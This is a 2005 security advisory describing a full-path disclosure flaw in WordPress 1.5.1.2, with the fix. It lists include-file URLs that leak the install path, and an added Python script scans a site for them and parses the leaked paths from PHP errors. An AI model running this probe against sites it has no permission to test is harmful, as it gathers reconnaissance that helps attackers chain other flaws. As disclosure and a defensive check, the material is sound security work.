11.16 21/06/2005 by rgod
http://rgod.altervista.org
rgod [at] autistici . org

WordPress 1.5.1.2 "Strayhorn" contains a flaw that may lead to unauthorized information disclosure. The files below are include files (admin helpers, theme templates, plugin stubs) that expect to be loaded by another script; when one of them is requested directly, PHP hits an undefined function or variable and, with display_errors enabled, prints an error message of the form "... in /full/path/to/wordpress/wp-includes/vars.php on line N". Requesting the following URLs therefore reveals the installation path, resulting in a loss of confidentiality. The path on its own is not exploitable, but it is useful to an attacker who is chaining it with another flaw that needs an absolute filesystem path.

path disclosure urls:

http://[victim]/wp-admin/admin-footer.php
http://[victim]/wp-admin/admin-functions.php
http://[victim]/wp-admin/edit-form.php
http://[victim]/wp-admin/edit-form-advanced.php
http://[victim]/wp-admin/edit-form-comment.php
http://[victim]/wp-admin/edit-page-form.php
http://[victim]/wp-includes/vars.php
http://[victim]/wp-includes/locale.php
http://[victim]/wp-content/plugins/hello.php
http://[victim]/wp-content/plugins/textile1.php
http://[victim]/wp-content/themes/default/page.php
http://[victim]/wp-content/themes/default/archive.php
http://[victim]/wp-content/themes/default/comments-popup.php
http://[victim]/wp-content/themes/default/index.php
http://[victim]/wp-content/themes/default/search.php
http://[victim]/wp-content/themes/default/single.php
http://[victim]/wp-content/themes/default/archives.php
http://[victim]/wp-content/themes/default/footer.php
http://[victim]/wp-content/themes/default/links.php
http://[victim]/wp-content/themes/default/searchform.php *
http://[victim]/wp-content/themes/default/404.php
http://[victim]/wp-content/themes/default/header.php *
http://[victim]/wp-content/themes/default/sidebar.php
http://[victim]/wp-content/themes/classic/comments.php
http://[victim]/wp-content/themes/classic/header.php
http://[victim]/wp-content/themes/classic/comments-popup.php
http://[victim]/wp-content/themes/classic/index.php
http://[victim]/wp-content/themes/classic/footer.php
http://[victim]/wp-admin/menu.php
http://[victim]/wp-admin/menu-header.php
http://[victim]/wp-admin/upgrade-functions.php
http://[victim]/wp-includes/classes.php
http://[victim]/wp-includes/default-filters.php
http://[victim]/wp-includes/feed-functions.php

solution:

put this line:

display_errors = Off

in the php.ini config file, in the "Error handling and logging" section, or add:

error_reporting(0);

at the beginning of each script.

The php.ini setting is the better of the two: it hides error output from visitors for every script on the host while log_errors = On still records the errors in the server log. error_reporting(0) silences the errors entirely, so nothing is logged and real problems go unnoticed.

rgod
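The following probe is an added example, not rgod's code and not part of the advisory. It requests each URL from the list above against a WordPress root, parses the standard PHP error format (plain text or the html_errors "<b>...</b>" variant) to pull out the leaked script path, and reduces it to the install directory. The hostname blog.example and the sample response bodies are constructed for offline use; the offline_fetch helper stands in for a live HTTP fetch, and http_fetch is what a real run would pass instead.

```python
"""Probe a WordPress 1.5.1.2 install for the full-path disclosure in rgod's advisory."""
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin

# The advisory's URL list, grouped by directory, relative to the WordPress root.
DISCLOSURE_PATHS = (
    ["wp-admin/" + f for f in (
        "admin-footer.php", "admin-functions.php", "edit-form.php",
        "edit-form-advanced.php", "edit-form-comment.php", "edit-page-form.php",
        "menu.php", "menu-header.php", "upgrade-functions.php")]
    + ["wp-includes/" + f for f in (
        "vars.php", "locale.php", "classes.php", "default-filters.php",
        "feed-functions.php")]
    + ["wp-content/plugins/" + f for f in ("hello.php", "textile1.php")]
    + ["wp-content/themes/default/" + f for f in (
        "page.php", "archive.php", "comments-popup.php", "index.php", "search.php",
        "single.php", "archives.php", "footer.php", "links.php", "searchform.php",
        "404.php", "header.php", "sidebar.php")]
    + ["wp-content/themes/classic/" + f for f in (
        "comments.php", "header.php", "comments-popup.php", "index.php", "footer.php")]
)

# A PHP error shown with display_errors=On reads, e.g.
#   Fatal error: Call to undefined function get_settings() in /var/www/blog/wp-includes/vars.php on line 7
# or, with html_errors=On, the same text with <b>...</b> around the level and the path.
# The regex accepts both forms and captures the script path (Unix or Windows drive-letter style).
PHP_ERROR_RE = re.compile(
    r"(?:Warning|Notice|Fatal error|Parse error)(?:</b>)?:\s*(?P<msg>.*?)\s+in\s+"
    r"(?:<b>)?(?P<path>(?:[A-Za-z]:\\|/)[^<\s]+?\.php)(?:</b>)?\s+on\s+line",
    re.S)


def extract_paths(body):
    """Return every filesystem path leaked by PHP error messages in a response body."""
    return [m.group("path") for m in PHP_ERROR_RE.finditer(body)]


def wp_root(path):
    """Strip the WordPress-relative tail so only the install directory remains."""
    return re.split(r"[\\/]wp-(?:admin|includes|content)[\\/]", path, maxsplit=1)[0]


def http_fetch(url, timeout=10):
    """Live fetch: return the body even on 4xx/5xx, since PHP fatals may come back as 500."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as r:
            return r.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.read().decode("utf-8", "replace")


def scan(base_url, fetch=http_fetch):
    """Request every advisory URL under base_url; return {url: leaked_path} for the ones that disclose it."""
    found = {}
    for rel in DISCLOSURE_PATHS:
        url = urljoin(base_url.rstrip("/") + "/", rel)
        paths = extract_paths(fetch(url))
        if paths:
            found[url] = paths[0]
    return found


# Constructed sample responses (not captured from any real host): one html_errors-style
# PHP 5 fatal, one plain-text PHP 4 style fatal with a Windows path. Every other URL
# gets a hardened-looking page, which is what display_errors=Off produces.
SAMPLE_RESPONSES = {
    "http://blog.example/wp-includes/vars.php":
        "<br />\n<b>Fatal error</b>:  Call to undefined function get_settings() in "
        "<b>/var/www/html/blog/wp-includes/vars.php</b> on line <b>7</b><br />\n",
    "http://blog.example/wp-includes/classes.php":
        "Fatal error: Call to undefined function:  get_settings() in "
        "C:\\Inetpub\\wwwroot\\blog\\wp-includes\\classes.php on line 5",
}
HARDENED_BODY = "<html><body></body></html>"


def offline_fetch(url):
    """Stand-in for http_fetch that serves the constructed sample responses."""
    return SAMPLE_RESPONSES.get(url, HARDENED_BODY)


if __name__ == "__main__":
    for url, path in scan("http://blog.example/", fetch=offline_fetch).items():
        print(f"{url} -> {path} (install root: {wp_root(path)})")
```

Against a live target, call scan("http://host/wordpress/") with the default http_fetch. Once display_errors is off, the error text no longer appears in the response and scan returns an empty dict; the requests still reach the include files, so this is a check of the symptom rather than proof that the files themselves have been restricted.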